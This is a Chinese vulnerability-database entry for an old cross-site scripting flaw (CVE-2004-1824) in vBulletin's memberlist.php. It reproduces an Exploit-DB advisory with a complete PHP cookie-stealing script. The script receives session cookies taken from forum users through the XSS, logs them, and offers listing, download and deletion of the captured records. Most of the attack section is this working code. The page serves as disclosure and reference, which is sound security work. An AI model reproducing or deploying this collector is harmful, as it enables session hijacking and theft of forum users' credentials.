JelSoft VBulletin MemberList.PHP跨站脚本攻击（XSS）漏洞-安全小百科

JelSoft VBulletin MemberList.PHP跨站脚本攻击（XSS）漏洞

漏洞ID	1107108	漏洞类型	跨站脚本
发布时间	2002-11-22	更新时间	2005-10-20
CVE编号	CVE-2004-1824	CNNVD-ID	CNNVD-200412-813
漏洞平台	PHP	CVSS评分	4.3

|漏洞来源

https://www.exploit-db.com/exploits/22030
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-813

|漏洞详情

JelsoftvBulletin3.0之前的版本存在跨站脚本攻击（XSS）漏洞。远程攻击者可以借助到memberlist.php的what参数注入任意web脚本或HTML。

|漏洞EXP

source: http://www.securityfocus.com/bid/6226/info

vBulletin does not filter HTML tags from URI parameters, making it prone to cross-site scripting attacks.

As a result, it is possible for a remote attacker to create a malicious link containing script code which will be executed in the browser of a legitimate user, in the context of the website running vBulletin.

This issue may be exploited to steal cookie-based authentication credentials from legitimate users of the website running the vulnerable software.

<?PHP
      // vBulletin XSS Injection Vulnerability: Exploit
      // ---
      // Coded By : Sp.IC ([email protected]).
      // Descrption: Fetching vBulletin's cookies and storing it into a
log file.

      // Variables:

      $LogFile = "Cookies.Log";

      // Functions:
      /*
      If ($HTTP_GET_VARS['Action'] = "Log") {
          $Header = "<!--";
          $Footer = "--->";
      }
      Else {

           $Header = "";
           $Footer = "";
      }
      Print ($Header);
      */
      Print ("<Title>vBulletin XSS Injection Vulnerability:
Exploit</Title>");
      Print ("<Pre>");
      Print ("<Center>");
      Print ("<B>vBulletin XSS Injection Vulnerability: Exploit</B>n");
      Print ("Coded By: <B><A
Href="MailTo:[email protected]">Sp.IC</A></B><Hr Width="20%">");
      /*
      Print ($Footer);
      */

      Switch ($HTTP_GET_VARS['Action']) {
          Case "Log":

                 $Data = $HTTP_GET_VARS['Cookie'];
                 $Data = StrStr ($Data, SubStr ($Data, BCAdd (0x0D, StrLen
(DecHex (MD5 (NULL))))));
                 $Log = FOpen ($LogFile, "a+");
                         FWrite ($Log, Trim ($Data) . "n");
                         FClose ($Log);
                         Print ("<Meta HTTP-Equiv="Refresh" Content="0;
URL=" . $HTTP_SERVER_VARS['HTTP_REFERER'] . "">");
          Break;
                Case "List":
                 If (!File_Exists ($LogFile) || !In_Array ($Records)) {
                     Print ("<Br><Br><B>There are No
Records</B></Center></Pre>");
                     Exit ();
                 }
                 Else {
                     Print ("</Center></Pre>");
                     $Records = Array_UniQue (File ($LogFile));
                                  Print ("<Pre>");
                                  Print ("<B>.:: Statics</B>n");
                     Print ("n");
                                  Print ("o Logged Records : <B>" . Count
(File ($LogFile)) . "</B>n");
                     Print ("o Listed Records : <B>" . Count
($Records) . " </B>[Not Counting Duplicates]n");
                     Print ("n");

                     Print ("<B>.:: Options</B>n");
                     Print ("n");

                     If (Count (File ($LogFile)) > 0) {
                         $Link['Download'] = "[<A Href="" .
$LogFile . "">Download</A>]";
                     }
                     Else{
                         $Link['Download'] = "[No Records in Log]";
                     }

                     Print ("o Download Log : " . $Link
['Download'] . "n");
                     Print ("o Clear Records : [<A Href="" .
$SCRIPT_PATH. "?Action=Delete">Y</A>]n");
                     Print ("n");
                     Print ("<B>.:: Records</B>n");
                     Print ("n");

                     While (List ($Line[0], $Line[1]) = Each ($Records)) {
                         Print ("<B>" . $Line[0] . ": </B>" . $Line[1]);
                     }
                 }

                 Print ("</Pre>");
          Break;
          Case "Delete":
              @UnLink ($LogFile);
              Print ("<Br><Br><B>Deleted Succsesfuly</B></Center></Pre>")
Or Die ("<Br><Br><B>Error: Cannot Delete Log</B></Center></Pre>");
              Print ("<Meta HTTP-Equiv="Refresh" Content="3; URL=" .
$HTTP_SERVER_VARS['HTTP_REFERER'] . "">");
          Break;
      }
    ?>

|参考资料

来源:SECUNIA
名称:11142
链接:http://secunia.com/advisories/11142
来源:XF
名称:vbulletin-showthread-xss(15495)
链接:http://xforce.iss.net/xforce/xfdb/15495
来源:BID
名称:9887
链接:http://www.securityfocus.com/bid/9887
来源:BUGTRAQ
名称:20040316JelSoftvBulletinMultipleXSSVulnerabilities
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=107945556112453&w;=2
来源:BID
名称:6226
链接:http://www.securityfocus.com/bid/6226
来源:OSVDB
名称:4312
链接:http://www.osvdb.org/4312
来源:XF
名称:vbulletin-memberlist-xss(10679)
链接:http://www.iss.net/security_center/static/10679.php
来源:SECTRACK
名称:1009440
链接:http://securitytracker.com/id?1009440
来源:BUGTRAQ
名称:20021121XSSbuginvBulletin
链接:http://archives.neohapsis.com/archives/bugtraq/2002-11/0276.html

相关推荐: Microsoft ISA Server Proxy Service Memory Leak Denial of Service Vulnerability

Microsoft ISA Server Proxy Service Memory Leak Denial of Service Vulnerability 漏洞ID 1103027 漏洞类型 Boundary Condition Error 发布时间 200…

文章版权归作者所有，未经允许请勿转载。

THE END